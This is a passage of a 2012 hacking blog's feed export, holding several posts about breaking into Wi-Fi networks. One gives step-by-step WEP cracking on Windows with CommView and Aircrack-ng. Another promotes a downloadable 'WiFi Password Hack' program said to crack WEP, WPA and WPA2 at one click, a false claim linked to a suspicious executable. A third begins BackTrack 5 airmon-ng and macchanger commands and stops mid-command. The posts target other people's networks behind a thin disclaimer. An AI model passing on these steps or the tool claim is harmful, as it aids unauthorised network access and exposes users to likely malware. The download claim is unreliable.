&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-in-windows.html&quot; style=&quot;background-color: white; border: 0px; color: #1155cc; cursor: pointer; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;Hack Wifi Password In Windows&lt;/a&gt;&lt;br style=&quot;background-color: white; color: #444444; font-family: Arial, Tahoma, Verdana; font-size: 13px;&quot; /&gt;&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/wifi-password-hack-how-to-hack-wifi.html&quot; style=&quot;background-color: white; border: 0px; color: #1155cc; cursor: pointer; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;Wifi Password Hack&lt;/a&gt;&lt;br style=&quot;background-color: white; color: #444444; font-family: Arial, Tahoma, Verdana; font-size: 13px;&quot; /&gt;&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/10/how-to-hack-into-computers-through-wifi.html&quot; style=&quot;background-color: white; border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;How To Hack Into Computers Through WiFi&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/1052161833922696074/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2012/11/wifi-hack-aio-2010.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/1052161833922696074'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/1052161833922696074'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2012/11/wifi-hack-aio-2010.html' title='WiFi Hack AIO 2010 '/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDcfgsD_XiQLqqHeKuP5PHRX2lsknJSIVSJ3atqOoHSddM-Pys8pGMWjheZ11psawrQaN9CxPpNKz8hxx-QrmpwBWf1QCEChlEN2gJOGyxCILJZXK7h0UlQWn5h36zr2oVt4bfGfxsnHw/s72-c/wifihack2010allinoness1.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-2870293389565130219</id><published>2012-11-22T06:30:00.000-08:00</published><updated>2013-09-07T03:03:44.540-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hack Wifi"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi Security"/><title type='text'>Hack Wifi Password In Windows</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
In my previous posts i have written about&amp;nbsp;&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/wifi-password-hack-how-to-hack-wifi.html&quot; style=&quot;border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13.333333015441895px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;Wifi Password Hack&lt;/a&gt;and also about&amp;nbsp;&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/10/how-to-hack-into-computers-through-wifi.html&quot; style=&quot;border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13.333333015441895px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;How To Hack Into Computers Through WiFi&lt;/a&gt;. Today i have written this tutorial regarding windows wifi hacking technique.&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ODC3eniKwfNpCrFYpI9IeyoKYJK_Ula4OW85HuZnw5ZNuLmheMZUE4aT8S1XO05dSE-2ATpMdvFEV0CkVYTJFHgU-LwfDidZEKb_K0YWxq63MX1jfBXnWDVEhbJ4zLAPoj0gpbGYxM4L/s1600/HACK+WIFI+PASSWORD+IN+WINDOWS.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ODC3eniKwfNpCrFYpI9IeyoKYJK_Ula4OW85HuZnw5ZNuLmheMZUE4aT8S1XO05dSE-2ATpMdvFEV0CkVYTJFHgU-LwfDidZEKb_K0YWxq63MX1jfBXnWDVEhbJ4zLAPoj0gpbGYxM4L/s1600/HACK+WIFI+PASSWORD+IN+WINDOWS.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
FIRSTLY WE KNOW ABOUT HOW TO HACK WIFI PASSWORD AND WHAT TOOL ARE REQUIRED TO HACK WIFI PASSWORD&lt;br /&gt;
&lt;strong&gt;TOOL REQUIRED FOR WIFI HACKING:&lt;/strong&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=1848613746302332574&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;h3&gt;
&lt;strong&gt;1. COMMVIEW FOR WIFI :-&lt;/strong&gt;&lt;/h3&gt;
this tool is used for capturing the packet of wifi which we have to 
crack.this is also used for convert the file which is required for crack
 ( in this crack we convert .ncf file to .cap file)&lt;br /&gt;
you can use this link to download this software&amp;nbsp;&lt;a href=&quot;http://www.sharebeast.com/fkpi60n3jhkr&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;CLICK HERE&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;strong&gt;Link Pass:&amp;nbsp;&amp;nbsp;&lt;/strong&gt;canuhack.blogspot.com&lt;br /&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;strong&gt;2. AIRCRACK -NG :-&lt;/strong&gt;&lt;/h3&gt;
&lt;div&gt;
this tool is used for retrieve password from captured file from commview for wifi software&lt;br /&gt;
to download software please&amp;nbsp;&lt;a href=&quot;http://www.sharebeast.com/vvkof9g4weei&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;CLICK HERE&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;
&lt;strong&gt;Link Pass:&amp;nbsp;&amp;nbsp;&lt;/strong&gt;canuhack.blogspot.com&lt;/div&gt;
&lt;h3&gt;
&lt;strong&gt;STEP TO HACK WIFI NETWORK IN WINDOW:-&lt;/strong&gt;&lt;/h3&gt;
&lt;div&gt;
1. install commview&lt;br /&gt;
2. after installation a popup window is open in commview software for 
driver installation .( if pop window not open then goto &amp;gt; help &amp;gt; 
driver installation guide then do this)&lt;br /&gt;
3. install commview driver for your wifi network( without 
installation of driver you cannot capture data of desired wifi network)&lt;br /&gt;
4. after installation of driver click on capture button on left corner of software.&lt;br /&gt;
5. a pop up window is open and show wifi network near you.&lt;br /&gt;
6. select wifi network which you want to hack and click on capture.&lt;br /&gt;
you must need to see your connection is wep or not.(this trick only work with wep)&lt;br /&gt;
7. after that you can see the commview capture wifi data.&lt;br /&gt;
8. now goto to logging panel in commview and tick on auto saving and put&lt;br /&gt;
maximum directory size, mb – 2000&lt;br /&gt;
average log file size- 20&lt;br /&gt;
9. now capture packets for 2-3 hour.( about 1 lakh packet)&lt;/div&gt;
&lt;h3&gt;
STEP TO CONVERT CAPTURED FILE.&lt;/h3&gt;
&lt;div&gt;
open commview and follow step&lt;br /&gt;
1. goto file&amp;gt;log viewer&lt;br /&gt;
2. after open log viewer&lt;br /&gt;
3.goto file&amp;gt; load commview log&amp;gt; select all capture file &amp;gt; then open&lt;br /&gt;
4. after opening goto&amp;gt;export logs &amp;gt; select wireshark tcpdump format&lt;br /&gt;
5. save file with desired location (this file is used for cracking password)&lt;/div&gt;
&lt;h3&gt;
&lt;strong&gt;CRACK PASSWORD USING AIRCRACK-NG:-&lt;/strong&gt;&lt;/h3&gt;
&lt;div&gt;
1. open download package.&lt;br /&gt;
2. goto bin and open aircrack-ng GUI.exe&lt;br /&gt;
3. open converted file&lt;br /&gt;
4. select key size – 64&lt;br /&gt;
5. click on launch&lt;br /&gt;
6. index no. of target file is– 1&lt;br /&gt;
7 wait for cracking password&lt;br /&gt;
8. if wifi password is cracked then it write&lt;br /&gt;
password 100% decrypted 94:13:26:54:66&lt;br /&gt;
in this password is 9413265466 for wifi&lt;br /&gt;
&lt;strong&gt;IF NOT CRACKED IN FIRST ATTEMPT&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;1.&lt;/strong&gt;&amp;nbsp;if password is not cracked then it say FAILED NEXT TRY WITH 5000 IVS.&lt;br /&gt;
&lt;strong&gt;2.&lt;/strong&gt;&amp;nbsp;so we have to again capture packets and repeat above process again till password is crack.&lt;br /&gt;
&lt;strong&gt;NOTE:&lt;/strong&gt;- when we again capture packet and convert it into cap then we have to select all previous captured packet also to convert.&lt;br /&gt;
If you are not satisfied with this technique you may also check these&lt;br /&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/wifi-hack-aio-2010.html&quot; style=&quot;background-color: #fff9e7; border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13.333333015441895px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;WiFi Hack AIO 2010&lt;/a&gt;&lt;br /&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-with-backtrack-5.html&quot; style=&quot;background-color: #fff9e7; border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13.333333015441895px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;Hack WIFI Password With Backtrack 5&lt;/a&gt;&lt;br /&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2013/01/wep-password-cracker-wireless-network.html&quot; style=&quot;background-color: #fff9e7; border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13.333333015441895px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;WEP Password Cracker: Wireless Network Hacking&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/2870293389565130219/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-in-windows.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/2870293389565130219'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/2870293389565130219'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-in-windows.html' title='Hack Wifi Password In Windows'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4ODC3eniKwfNpCrFYpI9IeyoKYJK_Ula4OW85HuZnw5ZNuLmheMZUE4aT8S1XO05dSE-2ATpMdvFEV0CkVYTJFHgU-LwfDidZEKb_K0YWxq63MX1jfBXnWDVEhbJ4zLAPoj0gpbGYxM4L/s72-c/HACK+WIFI+PASSWORD+IN+WINDOWS.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-5631979610922797378</id><published>2012-11-22T06:20:00.000-08:00</published><updated>2013-09-07T03:06:45.794-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hack Wifi"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Password Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi Security"/><title type='text'>Wifi Password Hack / How to hack wifi passwords / Hack wifi passwords</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
In my previous posts i have written about&amp;nbsp;&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-in-windows.html&quot; style=&quot;border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13.333333015441895px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;Hack Wifi Password In Windows&lt;/a&gt;and also about&amp;nbsp;&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/10/how-to-hack-into-computers-through-wifi.html&quot; style=&quot;border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13.333333015441895px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;How To Hack Into Computers Through WiFi&lt;/a&gt;. Today i have written this tutorial regarding windows wifi hacking technique.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;strong&gt;How to hack wifi password / Wifi password Hack&lt;/strong&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Hellow dear Visitators. Every one of us asked this question atleast 
once.How ca i hack wifi passwords for free Or how to hack wifi 
passwords.Well this is the answer that all of you expected.Our team of 
developers made a nice software after alot of hard work.This software 
was developed in around 6 month’s of hard work.Time that was necesary to
 test the cracking algorithm required to crack the security code of the 
wifii Networks.The software is coded in the most advance Programing 
language at this moment and will be regulary updated to meet the needs 
of our downloaders.In this post we will present you how the program 
works and how to use it ! The wifi password hack interface is user 
friendly and can be used even from a 10 years old kid.The need to acces 
wifi networks is wide because of the developing of smart phone’s and 
gadgets ho has acces to Wifi Networks.Our Team solved the problems that 
you encounter when you go in public places with wifi connection , but 
where the connection are password protected.Now with just a simple touch
 of a button you can get the password and navigate online without any 
problems.Then WiFi Password Hack is the right software for you. Our 
software it can hack any type of network encryption with the click of a 
button. WEP, WPA, WPA2 or whatever it is, it’s no match for WiFi 
Password Hack.Does this works ? It certainly does! WiFi Password Hack 
was put together by a group of qualified people. Call them hackers or 
whatever you like, but they know what they’re doing!&lt;br /&gt;
&lt;div&gt;
&lt;h2&gt;
Is it really free?&lt;/h2&gt;
Most definitely. The program comes to you at no cost! So what are you
 waiting for? Download WiFi Password Hack today and gain the ability to 
hack into any WiFi network you like!&lt;br /&gt;
Now watch the video proof posted Below !!!&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;&quot; class=&quot;alignnone&quot; height=&quot;240&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIGC4mml8qFtKsdNn5iiIvIO0bjeG0aP_aQBzBVgzcvT_ivBAI38yE31dbpkewH1ixv-nOBhkekBVVEV-z8UBTercczxxE4PIYPpEeAVdFJAmYLgWarTooEjZfqmV-WxsifTSMGfdx2gGs/s320/ss.png&quot; title=&quot;Wifi Password Hack&quot; width=&quot;378&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Install Notes:&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Step 1: &lt;strong&gt;&lt;span style=&quot;color: red;&quot;&gt;Click on Download Button&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;center&gt;
&lt;br /&gt;

&lt;br /&gt;
&lt;br /&gt;

&lt;div&gt;
Step 2 Run the application&lt;/div&gt;
&lt;div&gt;
Step 3: Enter SSID ( Wireless Name )&lt;/div&gt;
&lt;div&gt;
Step 4: Press “Get Password” button&lt;/div&gt;
&lt;div&gt;
Step 5: Wait to done the process&lt;/div&gt;
&lt;div&gt;
Step 6: Now login on hacked wireless with password&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
&amp;nbsp; Before you download you can check Virus scan by clicking on the button below!&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://virusscan.jotti.org/en/scanresult/855973f62861ee6e33bec9071ff84433e628712d&quot;&gt;Virus Scan&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div title=&quot;blog&quot;&gt;
Download the soft from here :&lt;/div&gt;
&lt;div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;a href=&quot;http://4shared.com/file/Q9YvOIq3/&quot;&gt;Click Here To Download&lt;/a&gt;&lt;/div&gt;
&lt;div title=&quot;blog&quot;&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
If you are not satisfied with this technique you may also check these&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/wifi-hack-aio-2010.html&quot; style=&quot;background-color: #fff9e7; border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13.333333015441895px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;WiFi Hack AIO 2010&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2012/11/hack-wifi-password-with-backtrack-5.html&quot; style=&quot;background-color: #fff9e7; border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13.333333015441895px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;Hack WIFI Password With Backtrack 5&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;a class=&quot;GHUY-LPOB&quot; href=&quot;http://hackerx-malik.blogspot.com/2013/01/wep-password-cracker-wireless-network.html&quot; style=&quot;background-color: #fff9e7; border: 0px; color: #1155cc; font-family: Arial, Helvetica, sans-serif; font-size: 13.333333015441895px; margin: 0px 10px 0px 0px; padding: 0px; text-decoration: none; vertical-align: baseline;&quot;&gt;WEP Password Cracker: Wireless Network Hacking&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/center&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/5631979610922797378/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2012/11/wifi-password-hack-how-to-hack-wifi.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/5631979610922797378'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/5631979610922797378'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2012/11/wifi-password-hack-how-to-hack-wifi.html' title='Wifi Password Hack / How to hack wifi passwords / Hack wifi passwords'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIGC4mml8qFtKsdNn5iiIvIO0bjeG0aP_aQBzBVgzcvT_ivBAI38yE31dbpkewH1ixv-nOBhkekBVVEV-z8UBTercczxxE4PIYPpEeAVdFJAmYLgWarTooEjZfqmV-WxsifTSMGfdx2gGs/s72-c/ss.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-5561937942847341051</id><published>2012-11-22T06:10:00.000-08:00</published><updated>2013-09-07T02:31:59.106-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Backtrack 5 Tutorial"/><category scheme="http://www.blogger.com/atom/ns#" term="Hack Wifi"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks How-To Guides"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet Security"/><category scheme="http://www.blogger.com/atom/ns#" term="Password Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Wifi Security"/><title type='text'>Hack WIFI Password With Backtrack 5 </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
I have also posted other methods in my previous posts&amp;nbsp;&lt;a href=&quot;http://hackerx-malik.blogspot.com/2013/01/wep-password-cracker-wireless-network.html&quot;&gt;WEP Password Cracker&lt;/a&gt;&amp;nbsp;and&amp;nbsp;&lt;a href=&quot;http://hackerx-malik.blogspot.com/2012/11/wifi-hack-aio-2010.html&quot;&gt;WiFi Hack AIO 2010&lt;/a&gt;&amp;nbsp;.&lt;br /&gt;
The Information Given Here Is Just For Educational Purpose. I am not responsible for any misuse of this knowledge.&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;WARNING:&lt;span style=&quot;font-size: x-small;&quot;&gt;Don&#39;t Hack any authorized router,otherwise you&#39;ll be put into jail.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&amp;nbsp;&lt;/span&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;Rules to Follow&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;;&quot;&gt;&lt;b&gt;A Backtrack Live CD&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;:&lt;/span&gt; &lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;the Linux Live CD that lets
     you do all sorts of security testing and tasks. Download yourself a copy
     of the CD and burn it, or load it up in VMware to get started.&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;here a link to download it &lt;a href=&quot;http://www.backtrack-linux.org/downloads/&quot;&gt;http://www.backtrack-linux.org/downloads/&lt;/a&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;A nearby WEP-enabled Wi-Fi network&amp;nbsp; &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: justify;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;Patience with the command line.&lt;/span&gt;&lt;/b&gt; This is an ten-step process that requires typing in
     long, arcane commands and waiting around for your Wi-Fi card to collect
     data in order to crack the password. Like the doctor said to the short
     person, be a little patient.&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; &amp;nbsp; &lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul&gt;

&lt;/ul&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12pt;&quot;&gt;&amp;nbsp;Steps to Follow:&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;Step
1 :&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;airmon-ng&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
The result will be something like :&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;Interface&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Chipset&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Driver&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;code&gt;wlan0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Intel
5100&amp;nbsp;&amp;nbsp;&amp;nbsp;iwlagn - [phy0]&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;airmon-ng start wlan0&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 11pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Change the mac address of the mon0 interface.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;code&gt;&lt;span style=&quot;font-size: 10pt; line-height: 115%;&quot;&gt;ifconfig mon0 down&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;; font-size: 10pt; line-height: 115%;&quot;&gt;&lt;br /&gt;
&lt;code&gt;macchanger
